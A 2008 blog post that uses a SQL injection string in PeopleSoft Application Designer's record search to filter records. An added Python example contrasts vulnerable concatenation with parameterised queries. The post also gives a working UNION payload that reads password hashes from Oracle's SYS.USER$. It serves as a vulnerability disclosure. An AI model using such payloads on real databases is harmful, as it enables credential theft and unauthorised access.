SQL Injection – Definition:

SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Scenario:

I was performing ALTER AUDIT for a training PeopleSoft environment, and the audit process used to terminate while processing a set of custom history records that all started with HEX% (for example PS_HEX_H_JOB, PS_HEX_H_PERS_NID, etc.).

Goal:

I wanted to insert all the records into the project skipping records that start with HEX.

Steps:

PeopleSoft Application Designer does not provide an option to skip selected records when inserting records into a project.

If I do not select any record name and press Enter, then it will list all the records (see below).

sql-injection-1

I have the option of selecting certain records using the “%” option as shown below.

sql-injection-2

However, there is no option to select all but skip some of the records.

Trick:

You can trick Application Designer by entering the following statement in the dialog box.

sql-injection-3

The statement is shown below.

%' AND RECNAME NOT LIKE 'HEX%

We have tricked App Designer into executing the following SQL for us.

SELECT RECNAME FROM PSRECDEFN WHERE RECNAME LIKE '%' AND RECNAME NOT LIKE 'HEX%' AND RECTYPE=0 ORDER BY 1

Notes:

Similarly, you can modify the SQL with other valid combinations to meet your requirements.
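To make the mechanism concrete, here is an added example (not the post's or PeopleSoft's code) that reproduces the dialog's query over a constructed SQLite stand-in for PSRECDEFN, contrasting string concatenation with a bound parameter; the wildcard-escaping helper covers the case where the user should not control % and _ at all.

```python
import sqlite3

# Constructed stand-in for the PeopleSoft PSRECDEFN table (record names and types);
# the HEX record names echo the post, the rest of the contents are made up.
SAMPLE_RECORDS = [
    ("JOB", 0), ("PERS_NID", 0), ("HEX_H_JOB", 0), ("HEX_H_PERS_NID", 0), ("JOB_VW", 1),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE PSRECDEFN (RECNAME TEXT, RECTYPE INTEGER)")
    conn.executemany("INSERT INTO PSRECDEFN VALUES (?, ?)", SAMPLE_RECORDS)
    return conn


def vulnerable_search(conn, user_input):
    """Concatenation, as the post infers Application Designer does: the text
    typed into the dialog becomes part of the SQL statement itself."""
    sql = ("SELECT RECNAME FROM PSRECDEFN WHERE RECNAME LIKE '" + user_input
           + "' AND RECTYPE=0 ORDER BY 1")
    return sql, [row[0] for row in conn.execute(sql)]


def safe_search(conn, user_input):
    """Bound parameter: the text is sent as data, so a quote cannot end the
    literal. % and _ still act as LIKE wildcards, which this dialog intends."""
    sql = "SELECT RECNAME FROM PSRECDEFN WHERE RECNAME LIKE ? AND RECTYPE=0 ORDER BY 1"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def escape_like(text, esc="\\"):
    """For searches where the user must NOT control wildcards: neutralise % and _."""
    return text.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def safe_prefix_search(conn, user_input):
    """Literal prefix match: wildcards escaped, trailing % supplied by the code."""
    sql = ("SELECT RECNAME FROM PSRECDEFN WHERE RECNAME LIKE ? ESCAPE '\\' "
           "AND RECTYPE=0 ORDER BY 1")
    return [row[0] for row in conn.execute(sql, (escape_like(user_input) + "%",))]


if __name__ == "__main__":
    conn = make_db()
    trick = "%' AND RECNAME NOT LIKE 'HEX%"   # the input typed in the post
    sql, rows = vulnerable_search(conn, trick)
    print(sql)   # the rewritten statement from the post
    print(rows)  # ['JOB', 'PERS_NID']: the smuggled NOT LIKE filter took effect
    print(safe_search(conn, trick))          # []: nothing is literally named that
    print(safe_prefix_search(conn, "HEX_"))  # ['HEX_H_JOB', 'HEX_H_PERS_NID']
```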

Vulnerability:

The SQL below provides us with a list of all the passwords from SYS.USER$.

%' UNION SELECT PASSWORD FROM SYS.USER$ WHERE '1%'='1

sql-injection-4

Posted by Nitin Pai
Comments (1)
March 28th, 2008

ILikePi - May 27th, 2008

Wow, that's really disturbing. Good find.